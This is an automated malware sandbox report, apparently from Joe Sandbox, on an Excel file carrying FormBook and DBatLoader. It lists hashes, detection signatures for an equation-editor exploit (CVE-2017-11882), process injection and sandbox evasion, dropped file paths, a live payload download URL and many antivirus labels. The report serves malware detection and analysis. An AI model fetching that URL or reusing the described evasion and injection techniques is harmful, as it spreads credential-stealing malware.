Windows Analysis Report 4514808437.xlsx

Overview

General Information

Sample Name: 4514808437.xlsx
Analysis ID: 532860
MD5: 0b1244570453cc560192b00e942239e9
SHA1: 6ce2f17a9ffb5640d69d07c71a5f2711482567fd
SHA256: 53ea97de19540a414997e31c383830b6ff1a5fb7120c1bf7ccf493280bc22b3d
Tags: FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

DBatLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: Droppers Exploiting CVE-2017-11882
Yara detected DBatLoader
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Contains functionality to inject code into remote processes
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Uses ipconfig to lookup or modify the Windows network settings
Sample uses process hollowing technique
Writes to foreign memory regions
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Drops PE files to the user directory
May check if the current machine is a sandbox (GetTickCount - Sleep)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Stores large binary data to the registry
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Contains functionality to detect sandboxes (mouse cursor move detection)
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://198.46.136.201/1100/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: 4514808437.xlsx ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match File source: 18.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.72480000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.logagent.exe.72480000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.logagent.exe.72480000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.logagent.exe.72480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.72480000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000000.634841930.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608536572.000000000481C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.620328507.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679947342.0000000000200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618763905.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522632126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613019160.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.619325801.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647079349.000000000487C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.526861084.0000000004990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615131533.0000000000120000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524711132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608637561.0000000004874000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.598639768.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.527023129.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.608694553.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.522033457.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633936132.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647442314.0000000072481000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.649627126.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.552620615.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679695031.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.647169348.00000000048D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.596046676.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.615524302.0000000000290000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.571508744.000000000977D000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.632901217.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.633270454.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.613597049.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.595476317.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.520406918.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.599301608.0000000072480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.679811889.00000000001D0000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 35%
Source: C:\Users\user\Esfjmbxd.exe ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 35%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\Esfjmbxd.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 11.3.Esfjmbxd.exe.1d996b4.183.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2459c.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8911c.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91894.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39768.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31894.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d33014.137.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28b08.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88e6c.169.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.2.vbc.exe.1e78c40.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d88fdc.173.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e80b08.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d598.275.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24370.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d99c94.205.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d94008.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8f438.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e80eec.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.3.Esfjmbxd.exe.1d3126c.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Esfjmbxd.exe.1d18c40.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25e30.138.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8cb84.227.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e850f4.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d4154c.246.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 18.0.logagent.exe.72480000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.Esfjmbxd.exe.1da10fc.238.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1b18.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d4154c.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e7cd68.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea2094.286.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.2.Esfjmbxd.exe.1d78c40.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e99f90.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d310a4.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31604.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d88b08.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d98008.153.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8c3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.72480000.4.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.3.Esfjmbxd.exe.1d38008.154.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91894.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24b88.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e852c8.114.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d310a4.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88b08.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ed4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d594.280.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d848e4.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9d0a8.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9e2fc.123.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c8e4.215.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d30ed4.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d99938.188.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e843b0.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1520.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91414.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84f28.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8cb84.229.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d1cd68.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1b78.256.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88d98.156.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d99938.187.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d992e0.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1774.248.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d252c8.112.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d392e0.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d25494.128.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9b840.150.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d598.275.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d444.265.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8459c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28d98.155.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d850f4.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85494.129.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8911c.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1ca4.266.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84b88.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24008.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d99a1c.193.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84370.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91604.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2cd5c.232.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e98fb8.159.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da0008.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d850cc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d378.255.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d5a0.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8cd5c.232.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41324.242.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d3e610.131.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91414.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea2764.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e88e6c.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1c54.262.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d98fb8.157.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.3.Esfjmbxd.exe.1d85eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d34008.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d3f438.210.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d285dc.151.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9db70.110.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2911c.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.logagent.exe.72480000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 8.3.Esfjmbxd.exe.1d3b840.150.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d390f4.171.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84d5c.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84b84.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d80e80.53.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d2c0.251.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c8e0.219.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e99a74.198.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d2c0.251.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e99768.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8c3b0.213.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e850f4.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e910a4.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8cb88.225.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d20c38.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2c8e0.220.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d4f4.269.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e990f4.170.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24d5c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1b18.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d85494.128.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e90ed4.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d843b0.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8943c.204.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea154c.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8932c.199.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2094.286.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1c54.261.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9f438.210.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d24b84.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da0ed4.233.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da154c.246.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e885dc.153.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d919ac.113.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d28fdc.173.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d992e0.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e95be4.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9058c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e7e84c.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1b78.258.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da1ca4.266.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d098.243.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1324.242.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d40008.214.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d20eec.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d38fb8.156.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d38008.153.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9b840.149.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e91894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d852c8.114.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d9b840.149.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d319ac.116.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41dac.268.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d91414.58.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8914c.181.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1774.249.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e9d60c.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8f438.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39a74.201.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39a74.198.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d84b88.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea10fc.238.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea1ef4.276.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1da2094.284.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2cb88.223.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d4199c.254.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d396b4.183.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8932c.192.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31414.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8459c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d850f4.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d90ed4.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2f438.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d390f4.168.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d33ffc.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31604.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d4f4.267.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d378.257.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8fb84.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d098.243.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d448.261.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d098.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d39c94.205.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8cd5c.232.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31d44.132.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41f44.280.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2d2c0.253.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d620.285.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d84d5c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d843b0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8d448.259.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d3e2fc.123.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d31b2c.124.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e80eec.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d2bffc.148.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d41c54.260.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea058c.216.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 11.3.Esfjmbxd.exe.1d8943c.203.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1ea0ed4.233.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d30ad4.83.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Esfjmbxd.exe.1d410fc.237.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e8d098.244.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.1e84370.24.unpack Avira: Label: TR/Patched.Ren.Gen
